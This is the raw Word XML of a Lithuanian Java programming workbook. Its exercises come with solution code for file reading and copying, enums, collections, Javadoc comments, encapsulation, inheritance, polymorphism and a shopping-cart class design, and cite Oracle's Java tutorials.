      <w:r w:rsidR="003A5380">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Buffered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Buffer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ile file = new File("poem.t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aCount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FileReader fileReader = new FileReader(fi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ufferedReader bufferedReader = new BufferedReader(fileRead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tringBuilder stringBuilder = new StringBuil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tring currentLine = bufferedReader.read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hile (currentLine != nul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xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       stringBuilder.append(current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stringBuilder.append("\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currentLine = bufferedReader.read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stringBuil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IOException e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ex.printStackTra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3A5380" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Failo poem.txt turin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dvanced topics of object oriented programm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esenting the world as a random collec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objects is dubious. Far from perfec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t hardly can pass for a decent expres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our senses. (With equal pas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e could be designing a storing procedur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For local morgues.) The essential featur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any good system of views, is consensus ndash;</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rational thought and the deepest of senses ndash;</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What “s called intuition. But let “s take a glance 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This seemingly faceless and meaningless concep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n object in short, is a representa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any one thing, (or, in fact, combina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things). And despite what the instincts would tell you,</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n object can (painfully) have no valu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Thus taking some space to declare an instan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Of nothing that can justify its existence.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKI</w:t>
      </w:r>
      <w:r w:rsidR="00A56804" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TE JAVA KLASĘ VARDU JAVAIO.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00625563">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In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NotFound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OutputStre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IO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throws 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FileInputStream fis = new FileInputStream("poem.t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ileOutputStream fos = new FileOutputStream("new_poem.t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int stack;</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while ((stack = fis.read()) != -1)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fos.write(stack);</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FileNotFoundException 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Failo poem.txt turin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But there is one thing that can cause us to todd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Unwittingly, we, by creating the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re changing the source (or the world, which within i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Has now the model itself). It “s the limi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logic, that jeopardizes the miss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The programmers call it a racing condi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agine a person in front of one mirr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hile holding another hellip; the imminent fe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n face of the endless array of reflec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The open door to infinity. Ac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ike this can effectively lead to a tum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n sensitive brains. Let “s resort to some hum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nd follow the syntax, as well as the ethic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Of programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA IŠVARDINIMŲ (</w:t>
      </w:r>
      <w:r w:rsidR="007E3875" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ENUM) KLASĘ VARDU JAVAENUM.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00FE0183">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enum JavaEnum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MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDA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rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Enum Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId138" w:history="1">
        <w:r w:rsidRPr="00F4101E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/javaOO/enum.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F4101E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KL</w:t>
      </w:r>
      <w:r w:rsidR="000A2CB6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ASĘ VARDU JAVAWORKWITHENUM.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00F4101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WorkWithEnum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List&lt;String&gt; weekDays = new ArrayLis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JavaEnums javaEnums: JavaEnums.value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eekDays.add(javaEnums.name().toLowerCa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javaEnums.toString().toLowerCa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weekDays.size();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eekDays.set(i, (i + 1) + " " + weekDays.get(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ays of the week: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weekDa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0 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. SUKURKITE JAVA KLASĘ </w:t>
      </w:r>
      <w:r w:rsidR="00D91C56" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VARDU JAVASQUAREAREA.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00F4101E">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SquareArea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side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side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JavaSquareArea(double sideOne, double sideTwo)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sideOne = side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sideTwo = side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this.sideOne * this.side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1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ</w:t>
      </w:r>
      <w:r w:rsidR="00D91C56" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> VARDU JAVAWORKWITHPACKAGE.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="006748A4">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packag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simple.JavaSquareAre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WorkWithPackag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JavaSquareArea squareArea = new JavaSquareArea(4, 4);</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right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006748A4">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="006748A4">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Lesson: Packages</w:t>
      </w:r>
      <w:r w:rsidRPr="006748A4">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006748A4">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> [žiūrėta 2019-05-27]. Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId139" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:bCs/>
            <w:color w:val="006400"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/package/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>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12 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00D91C56" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KLASĘ VARDU JAVAARRAYLIST.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00321185">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Collec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ArrayLi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rrayList&lt;Integer&gt; arrayList = new ArrayLis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20; i++)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arrayList.add((int) (Math.random() *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Integer number array: " + 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ollections.sort(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orted Integer number array: " + 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3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE JAVA </w:t>
      </w:r>
      <w:r w:rsidR="008666FD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KLASĘ VARDU JAVALINKEDLIST.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00321185">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Collec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inked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LinkedLi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inkedList&lt;Integer&gt; linkedList = new LinkedLis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20; i++)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linkedList.add((int) (Math.random() * 10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Integer number array: " + linked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ollections.shuffle(linked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huffled Integer number array: " + linked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4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKIT</w:t>
      </w:r>
      <w:r w:rsidR="008666FD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>E JAVA KLASĘ VARDU JAVAMAP.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00AD7084">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Collec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HashMap;</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import java.util.Rando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Se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Map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HashMap&lt;Integer, Integer&gt; hashMap = new HashMap&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100;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hashMap.put(i, (int) (Math.random() * 10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et&lt;Integer&gt; keys = hashMap.keySe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Integer key: key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Value of " + key + " is: " + hashMap.get(ke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hashMap.containsValue(100))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hashmap contains number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hashmap does not contains number 1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15 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKIT</w:t>
      </w:r>
      <w:r w:rsidR="008666FD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>E JAVA KLASĘ VARDU JAVASET.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="002C530E">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TreeSe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Se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eeSet&lt;Integer&gt; treeSet = new TreeSe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40;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reeSet.add((int) (Math.random() *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treeSe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outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">16 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. IŠNAGRINĖKITE PATEIKTĄ KODĄ IR SURASKITE VISAS KLAIDAS, KURIAS PADARĖ PROGRAMUOTOJAS, KURIS NESINAUDOJA JAVA KODAVIMO STANDARTAIS</w:t>
      </w:r>
      <w:r w:rsidR="00B5714D">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Teisingas koda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Standard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 text = "We are comparing conte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Buffer stringBuffer = new StringBuffer("We are comparing conten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text.contentEquals(stringBuff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ontent is equa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r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println("The content is not equa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jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>17 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT JAVADOC STANDARTĄ PARAŠYKITE PRASMINGUS KOMENTARUS PATEIKTAM JAVA KODUI</w:t>
      </w:r>
      <w:r w:rsidR="00B5714D">
        <w:rPr>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simp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lt;h1&gt;Add Two Numbers!&lt;/h1&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The AddNum program implements an application th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simply adds two given integer numbers and Prin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the output on the scree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lt;p&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lt;b&gt;Note:&lt;/b&gt; Giving proper comments in your program makes it mor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user friendly and it is assumed as a high quality co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author auth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version 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 @since 2019-04-0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AddNum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This method is used to add two integers. This i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a the simplest form of a class method, just t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show the usage of various javadoc Tag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param numA This is the first paramter to addNum metho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param numB This is the second parameter to addNum metho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return int This returns sum of numA and num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Num(int numA, int numB)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A + num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This is the main method which makes use of addNum metho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param args Unus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return Noth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throws IOException On input err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 @see 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throws IOExceptio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ddNum obj = new AddNu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int sum = obj.addNum(10,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um of 10 and 20 is :" + su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7573CC" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc780327580"/>
      <w:bookmarkStart w:id="314" w:name="_Toc10444011"/>
      <w:bookmarkStart w:id="315" w:name="_Toc13095559"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.3.</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="316" w:name="_Toc13833453"/>
      <w:bookmarkStart w:id="317" w:name="_Toc14392514"/>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Taikyti objektinio programavimo principus programuojant.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
      <w:bookmarkEnd w:id="314"/>
      <w:bookmarkEnd w:id="315"/>
      <w:bookmarkEnd w:id="316"/>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD"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SUKU</w:t>
      </w:r>
      <w:r w:rsidR="00422E95" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>RKITE JAVA KLASĘ VARDU CAR.JAVA</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Ca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col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Car(String model, String color, double speed, String fuel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model =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color = col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speed =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fuelType =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Mode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Colo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col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Spee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Fuel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fuelType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this.model + " can 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this.model + " can't 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2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. SUKURKITE </w:t>
      </w:r>
      <w:r w:rsidR="00422E95" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JAVA KLASĘ VARDU MAIN.JAVA</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public class Mai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r toyota = new Car("Yaris", "Red", 210, "Gaso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r mercedes = new Car("GLE", "White", 250, "Dies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toyota.getSpeed() &gt; mercedes.get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oyota speed &gt; Mercedes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Mercedes speed &gt; Toyota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outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. PAKEISKITE UŽDUOTYJE SUKURTĄ CAR.JAVA KLASĘ TAIP, KAD BŪTŲ PASLĖPTA PAPROGRAMĖ CANDRIVE(). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009873BB" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Taip pat pakeiskite parametro „spalva” savybę taip, kad jo negalima būtų keisti</w:t>
      </w:r>
      <w:r>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Ca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String COLOR = "Whit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Car(String model, double speed, String fuel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model =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speed =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fuelType =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ring getMode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mod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double getSpee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spee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ring getFuel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void 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fuelType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this.model + " can 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this.model + " can't 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4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLA</w:t>
      </w:r>
      <w:r w:rsidR="00CE0C19" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SĘ VARDU JAVAENCAPSULATION.JAVA</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Encapsulatio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JavaEncapsulation(String name, double price, double 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ame =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price =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vat = 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String getNam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this.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get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this.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get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final double getPriceWith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this.getPrice() * this.get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5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU TOYO</w:t>
      </w:r>
      <w:r w:rsidR="00CE0C19" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TA.JAVA</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Toyota extends C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oyota(String model, double speed, String fuelType, String engine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model, speed,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engineType =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Engine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6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU MERCEDES.JAVA</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Mercedes extends C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ivate int seat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Mercedes(String model, double speed, String fuelType, int seatNumb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model, speed,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seatNumber = seat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public int getSeatNumb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seat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7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PAKEISKITE UŽDUOTYJE SUKURTĄ TOYOTA.JAVA KLASĘ TAIP, KAD AUTOMOBILIS GALĖTŲ NE TIK VAŽIUOTI BET IR SKRISTI</w:t>
      </w:r>
      <w:r w:rsidR="009873BB">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Toyota extends Ca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ivate String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oyota(String model, double speed, String fuelType, String engine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model, speed, fuel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engineType =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EngineTyp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engineTyp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void carDri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super.getFuelType()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getModel() + " can f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els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The car " + getModel() + " can't f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8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE KLASES DEM</w:t>
      </w:r>
      <w:r w:rsidR="00CE0C19" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>OPOLYMORPHISM.JAVA IR TEST.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="009873BB">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DemoPolymorphism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int x, int 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x + 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int x, int y, int z)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x + y + z;</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double x, int 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int) x + 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int add(int x, double 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x + (int) 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public class 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emoPolymorphism demoPolymorphism = new DemoPolymorphis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emoPolymorphism.add(2, 3));</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emoPolymorphism.add(2, 3, 4));</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emoPolymorphism.add(2, 3.4));</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demoPolymorphism.add(2.5, 3));</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outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAGAL PATEIKTĄ PARDUOTUVĖS KLASIŲ DIAGRAMĄ SUKURKITE REIKALINGAS KLASES IR INTERFEISUS SU REIKALINGAI</w:t>
      </w:r>
      <w:r w:rsidR="00CE0C19" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S KLASIŲ LAUKAIS, PAPROGRAMĖMIS</w:t>
      </w:r>
      <w:r w:rsidR="00201154">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abstract class AbstractProduc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doubl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AbstractProduct(String name, double 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ame =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price =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ring getNam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final double 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this.getPrice() * this.get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abstract double get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Product extends AbstractProduct implements ShoppingCartIte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double VAT = 1.2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Product(String name, double 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nam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Overr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Periodical extends AbstractProduct implements ShoppingCartIte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double PERIODICAL_VAT = 1.09;</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Periodical(String name, double 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nam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Overr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PERIODICAL_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Medicine extends AbstractProduct implements ShoppingCartIte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double MEDICINE_VAT = 1.0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Medicine(String name, double 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uper(nam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Overr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MEDICINE_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interface ShoppingCartItem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double get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double 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i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ShoppingC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List&lt;ShoppingCartItem&gt; items = new ArrayList&lt;&g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add(ShoppingCartItem ite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tems.add(ite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Total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totalPrice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ShoppingCartItem item : item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otalPrice += item.get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return total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getTotal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totalPriceWithVat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ShoppingCartItem item : item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otalPriceWithVat += item.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total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Mai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Medicine panadol = new Medicine("Panadol", 12.4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eriodical newspaper = new Periodical("Lietuvos rytas", 3.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 myCart = new ShoppingC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myCart.add(panado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myCart.add(newspap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myCart.getTotal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after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
